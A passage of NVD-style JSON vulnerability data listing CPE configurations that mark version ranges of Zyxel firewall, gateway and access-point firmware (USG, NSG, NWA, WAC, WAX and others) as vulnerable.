                    "cpe23Uri": "cpe:2.3:o:zyxel:usg_40w_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "4.71",
                    "versionStartIncluding": "4.09",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:usg_40w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:usg_60_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "4.71",
                    "versionStartIncluding": "4.09",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:usg_60:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:usg_60w_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "4.71",
                    "versionStartIncluding": "4.09",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:usg_60w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "5.21",
                    "versionStartIncluding": "4.50",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "5.21",
                    "versionStartIncluding": "4.50",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "5.21",
                    "versionStartIncluding": "4.50",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "5.21",
                    "versionStartIncluding": "4.50",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_500:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "5.21",
                    "versionStartIncluding": "4.50",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_700:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:usg200_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "4.71",
                    "versionStartIncluding": "4.09",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:usg200:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:usg20_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "4.71",
                    "versionStartIncluding": "4.09",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:usg20:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:usg210_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "4.71",
                    "versionStartIncluding": "4.09",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:usg210:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:usg2200_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "4.71",
                    "versionStartIncluding": "4.09",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:usg2200:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:usg300_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "4.71",
                    "versionStartIncluding": "4.09",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:usg300:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:usg310_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "4.71",
                    "versionStartIncluding": "4.09",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:usg310:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nsg300_firmware:1.33:-:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nsg300_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.33",
                    "versionStartIncluding": "1.00",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nsg300_firmware:1.33:patch1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nsg300_firmware:1.33:patch2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nsg300_firmware:1.33:patch3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nsg300_firmware:1.33:patch4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:nsg300:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nsg100_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.33",
                    "versionStartIncluding": "1.00",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nsg100_firmware:1.33:-:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nsg100_firmware:1.33:patch1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nsg100_firmware:1.33:patch2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nsg100_firmware:1.33:patch3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nsg100_firmware:1.33:patch4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:nsg100:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nsg50_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.33",
                    "versionStartIncluding": "1.00",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nsg50_firmware:1.33:-:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nsg50_firmware:1.33:patch1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nsg50_firmware:1.33:patch2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nsg50_firmware:1.33:patch3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nsg50_firmware:1.33:patch4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:nsg50:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nxc2500_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.10\\(aaig.3\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:nxc2500:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nxc5500_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.10\\(aaos.3\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:nxc5500:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nap203_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.25\\(abfa.7\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:nap203:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nap303_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.25\\(abex.7\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:nap303:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nap353_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.25\\(abey.7\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:nap353:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nwa50ax_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.25\\(abyw.5\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:nwa50ax:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nwa55axe_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.25\\(abzl.5\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:nwa55axe:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nwa90ax_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.27\\(accv.2\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:nwa90ax:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nwa110ax_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.30\\(abtg.2\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:nwa110ax:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nwa210ax_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.30\\(abtd.2\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:nwa210ax:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nwa1123-ac-hd_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.25\\(abin.6\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:nwa1123-ac-hd:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nwa1123-ac-pro_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.25\\(abhd.7\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:nwa1123-ac-pro:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nwa1123acv3_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.30\\(abvt.2\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:nwa1123acv3:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nwa1302-ac_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.25\\(abku.6\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:nwa1302-ac:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:nwa5123-ac-hd_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.25\\(abim.6\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:nwa5123-ac-hd:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:wac500h_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.30\\(abwa.2\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:wac500h:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:wac500_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.30\\(abvs.2\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:wac500:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:wac5302d-s_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.10\\(abfh.10\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:wac5302d-s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:wac5302d-sv2_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.25\\(abvz.6\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:wac5302d-sv2:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:wac6103d-i_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.25\\(aaxh.7\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:wac6103d-i:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:wac6303d-s_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.25\\(abgl.6\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:wac6303d-s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:wac6502d-e_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.25\\(aasd.7\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:wac6502d-e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:wac6502d-s_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.25\\(aase.7\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:wac6502d-s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:wac6503d-s_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.25\\(aasf.7\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:wac6503d-s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:wac6553d-s_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.25\\(aasg.7\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:wac6553d-s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:wac6552d-s_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.25\\(abio.7\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:wac6552d-s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:wax510d_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "6.30\\(abtf.2\\)",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:wax510d:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
